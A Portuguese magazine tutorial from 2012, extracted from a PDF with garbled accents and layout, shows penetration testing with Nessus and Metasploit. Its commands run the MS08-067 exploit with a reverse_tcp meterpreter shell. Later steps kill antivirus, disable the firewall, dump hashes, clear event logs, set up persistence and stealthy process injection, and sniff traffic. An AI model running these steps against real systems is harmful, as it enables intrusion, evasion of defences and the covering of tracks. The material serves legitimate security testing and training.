Testes de vulnerabilidade com Metasploit | SEGURANA
Testes de vulnerabilidade com Metasploit
Inimigo espreita
Saiba como o invasor visualiza a sua rede
e descubra como fcil desarmar suas
prprias defesas com Metasploit.
por David J. Dodd
O
framework Metasploit [1]
uma caixa de ferramentas
para testes de invaso, uma
plataforma para desenvolvimento de
exploits (programas que exploram
vulnerabilidades), alm de uma fer-
ramenta de pesquisa. Inclui centenas
de exploits remotos funcionais para
diversas plataformas. Ao misturar e
combinar payloads, encoders e gera-
dores de NOP slide [2] com mdulos
exploit, possvel solucionar quase
todas as tarefas relacionadas a exploits.
Neste artigo, vamos gui-lo no uso
da ltima verso do plugin Nessus
em um teste de invaso.
Descubra como consultores de se-
gurana usam o Metasploit para son-
dar e invadir um sistema real; e veja
Figura 1 Abra o navegador em https://localhost:8834.
Linux Magazine #92 | Julho de 2012
algumas dicas teis sobre o framework
para conseguir escalonar privilgios.
Por exemplo, no seria timo ter um
Shell em outro computador para o
caso de perder seu acesso Shell?
Integrao do
Nessus 5
Com o lanamento da ferramenta de
deteco de vulnerabilidades de confi-
gurao Nessus 5, da Tenable Network
Security, usurios agora tm melhores
filtros, anlise e relatrios, assim como
deteco mais rpida de problemas
de segurana. O plugin Metasploit
Nessus permite selecionar apenas as
verificaes que abrangem vulnera-
bilidades que esto no Metasploit.
SEGURANA
Para comear, entre no site da Te-
nable [3], baixe o Nessus 5 e o instale.
A nova instalao vai residir em
/opt/nessus e subscrever qualquer
instalao Nessus prvia. Inicie o
daemon nessus e abra o navegador
em https://localhost:8834 . Faa
login, v at Policies e clique em
Add (figura 1). D um ttulo para
sua poltica e clique em Next. Na
pgina Credentials, deixe as defi-
nies-padro e clique em Next,
embaixo.
A pgina Plugins possibilita adicio-
nar um filtro. Um menu drop-down
apresenta diversas opes de escolha
(garanta que as opes is equal to e
true estejam selecionadas e clique
em Save figura 2).
Depois, desabilite todos os plu-
gins, selecione a famlia de plugins
que quer habilitar e clique em
Enable Plugins no canto superior
direito do painel. Faa isso para
todos os plugins que quiser ha-
bilitar, ento clique em Submit,
logo abaixo.
Para comear uma verificao,
clique em Scans. Nomeie a veri-
53
 SEGURANA | Testes de vulnerabilidade com Metasploit
ficao e digite run now, schedu-
led ou template. No menu Policy,
escolha a poltica que foi criada,
depois selecione um alvo. Agora
inicie uma verificao o tempo
requerido para executar isso ser
surpreendentemente breve.
Posteriormente enviado um re-
latrio que lista Plugin ID, Count,
Figura 2 Opes de exploits disponveis.
Figura 3 Um relatrio informa qual exploit Metasploit pode ser usado efetiva-
mente contra o sistema em questo.
Figura 4 Carregamento do Nessus (topo) e listagem das polticas disponveis.
54
Severity, Name e Family para cada
plugin relacionado ao Metasploit
(figura 3).
A coluna Name informa quais
exploits Metasploit tm mais chan-
ce de um ataque bem sucedido no
sistema sendo testado.
Para iniciar uma verificao no
prprio framework Metasploit, ini-
vai mirar em uma nica mquina
cie o console msfconsole e carregue
o Nessus com o comando:
msf > load nessus
Quando os plugins forem carrega-
dos, conecte com o servidor:
msf > nessus_connect
cr0wn:password@localhost ok
Agora, mostre os plugins dispo-
nveis com o comando nessus_po-
licy_list (figura 4).
Use uma poltica para realizar um
scan na rede com o comando nessus_
scan_new, acrescentando o ID da poltica,
o nome da verificao e o intervalo-alvo
de IPs. Por exemplo, o comando
nessus_scan_new 5 windozxp
10.10.3.219
Windows XP com o endereo IP
10.10.3.219 (figura 5).
Se estiver conectado com um
banco de dados dentro do framework
Metasploit, abra uma visualizao
dos dados a partir do console; ou
visualize os dados em um navegador.
Agora podemos selecionar um
exploit para usar no sistema-alvo. Di-
gamos que quero usar a falha MS08-
067, que vai obter um acesso Shell
no computador-alvo. Para conseguir
isso, fao o seguinte:
msf > use exploit/windows/smb/
ms08_067_netapi
msf > set payload U
windows/meterpreter/reverse_tcp
msf > set lhost 10.10.3.218
msf > set lport 5555
msf > set rhost 10.10.3.188
msf > exploit meterpreter >
Comandos teis
Agora que tenho um acesso Shell na
mquina Windows, h diversas opes
para serem exploradas. Por exemplo,
posso verificar se o computador-alvo
uma mquina virtual ou se existe
um antivrus sendo executado. Tam-
bm posso ver como a subrede
local e que tipo de configurao de
segurana existe no sistema-alvo. O
www.linuxmagazine.com.br
 Testes de vulnerabilidade com Metasploit | SEGURANA

Metasploit vem com alguns scripts

teis para executar essas tarefas.
meterpreter > run checkvm

O prximo comando mostra o

menu de ajuda com opes:
meterpreter > run getcountermeasure -h

Use -d para desabilitar o firewall

embutido:
meterpreter > run getcountermeasure -d

Para matar a maioria dos progra-

mas antivrus, execute o script killav:
meterpreter > run killav
Figura 5 Conexo com o servidor (topo), lista de polticas (meio) e incio de
Para identificar a mscara de subre- uma verificao com o comando nessus_scan_new (embaixo).
de local, execute get_local_subnets:
meterpreter > run get_local_subnets

Pesquise o host por dados interes-

santes, como uma lista de arquivos
por tipo (*.pdf, *.txt, *.doc, *.jpg
etc). Para isso, use a funo search:
meterpreter > search -h
meterpreter > search -f *.pdf

Para obter dados detalhados sobre

o sistema, use os scripts winenum e
scraper. O winenum faz um dumping
com tokens e hashes, fornecendo
muitos dados (figura 6). O script
scraper colhe os dados do registro
e do sistema:
meterpreter > run winenum
meterpreter > run scraper

Agora vamos apagar os arquivos de

log. Para fazer isso, abra o menu do
Meterpreter com o comando irb. De-
pois, dispare os seguintes comandos:

meterpreter > irb

[*] Starting IRB shell
[*] The 'client' variable holds
the meterpreter client
>> log = client.sys.eventlog.
open('system')
>> log.clear

Ao fazer isso, irei mais adiante e apa-

garei os logs de segurana e aplicativos,
mudando system nesses comandos por
security e application, respectivamente. Figura 6 Dumping de hashes e tokens com o comando winenum.

Linux Magazine #92 | Julho de 2012 55

 SEGURANA | Testes de vulnerabilidade com Metasploit
Figura 7 Procure processos que no vo atrair nenhuma ateno.
Poder passar um Shell meterpre-
ter para membros da equipe com os
quais o teste estiver sendo executado
valioso. Essa opo no havia se
apresentado a mim at que fiz um
curso na Industrial Control Syste-
ms Advanced Cybersecurity, o qual
foi ministrado pela US-CERT [4].
Recomendo que qualquer pessoa
que trabalhe na rea de sistemas
ICS/SCADA faa esse curso. Um
Figura 8 O comando tasklist no revela nenhuma evidncia da invaso.
56
msf > use multi/handler
dia, houve um exerccio de 12 horas
em que os participantes atacavam
(time vermelho) ou defendiam (time
azul). Eu estava no time vermelho,
e ter a habilidade de passar Shells
meterpreter para meus colegas de
time foi til.
No restante deste artigo, irei mos-
trar alguns exemplos de como com-
partilhar um Shell Meterpreter. No
primeiro exemplo, uso o script me-
Shells meterpreter usando o script
terpreter persistence (para uma lista
de opes, use a opo -h):
Meterpreter > run persistence -h
Meterpreter > run persistence -X
-i 5 -p 5555 -r 10.10.3.180
Esse comando joga uma sesso me-
terpreter em um sistema remoto (com
-r 10.10.3.180) em um intervalo de
cinco segundos (-i 5), na porta 5555
(-p 5555); em seguida, essa sesso
carregada e executada (-x) cada vez
que a mquina inicia. O receptor
aguarda pelo Shell Meterpreter usan-
do o mdulo exploit multi/handler:
msf > set payload windows/
meterpreter/reverse_tcp
msf > set lhost 10.10.3.180
msf > set lport 5555
msf > exploit
O segundo exemplo um pouco
mais furtivo e pode injetar seu Shell
Meterpreter em um processo exis-
tente. Aps executar o comando ps a
partir do Meterpreter, obtenha uma
lista de processos ativos. Examine a
lista e procure processos que no vo
atrair ateno, como IEXPLORER.EXE
PID 3664 (figura 7).
Injetar o Shell Meterpreter no pro-
cesso IEXPLORE.EXE seria bem furtivo.
Usarei o comando multi_meter_inject
com as seguintes opes:
meterpreter > run
multi_meter_inject -pt
windows/meterpreter/reverse_tcp
-mr 10.10.3.180 -p 3664
Esse comando lana uma sesso
meterpreter para um sistema remoto
(-mr) 10.10.3.180, na porta (-p) 3664.
O recipiente estaria esperando pelo
Shell usando o multi/handler, apenas
trocando lport para 3664.
Agora, ao executar anlises bsi-
cas na mquina da vtima, execute
tasklist e nada vai parecer fora de
lugar (figura 8), mas ao executar
netstat -an, ser exibida uma cone-
xo externa (figura 9).
Uma terceira maneira de enviar
www.linuxmagazine.com.br
 Testes de vulnerabilidade com Metasploit | SEGURANA

meterpreter duplicate. No prompt

meterpreter, digite:
meterpreter > run duplicate -h

Esse comando fornece diversas

opes, e o comando a seguir envia
um Shell Meterpreter ao endereo
10.10.3.180 na porta-padro 4546
(figura 10):
meterpreter > run duplicate
-r 10.10.3.180

possvel executar um farejador

de pacotes na sistema-alvo aps com-
partilhar um Shell Meterpreter com
um parceiro. Esse script meterpreter
chamado de packetrecorder, sendo
mais granular ao capturar pacotes:
meterpreter > run packetrecorder

Para determinar a interface a ser

monitorada, use o comando run pa-
cketrecorder -li. Ele lista interfaces
de rede; escolha uma interface e um
destino para gravar o arquivo:
meterpreter > run packetrecorder
-i -l /home/tmp/
[*] Packet capture interval is
30 seconds

Voc pode analisar o arquivo de-

pois com o Wireshark ou tcpdump.

Mais informaes
Figura 9 O comando netstat -an revela evidncias de uma conexo estranha.
[1] Metasploit: http://www.
metasploit.com/

[2] NOP slide: http://

en.wikipedia.org/
wiki/NOP_slide

[5] Tenable: http://www.

tenable.com/products

[6] US-CERT: http://

www.us-cert.gov/

Gostou do artigo?
igo?
Queremos ouvir sua opinio.
pinio.
Fale conosco em
m
cartas@linuxmagazine.com.br
zine.com r
Este artigo no nosso
sso site:
s e:
http://lnm.com.br/article/7151
r/artic 715 Figura 10 Inicializao de um shell meterpreter com o script duplicate.

Linux Magazine #92 | Julho de 2012 57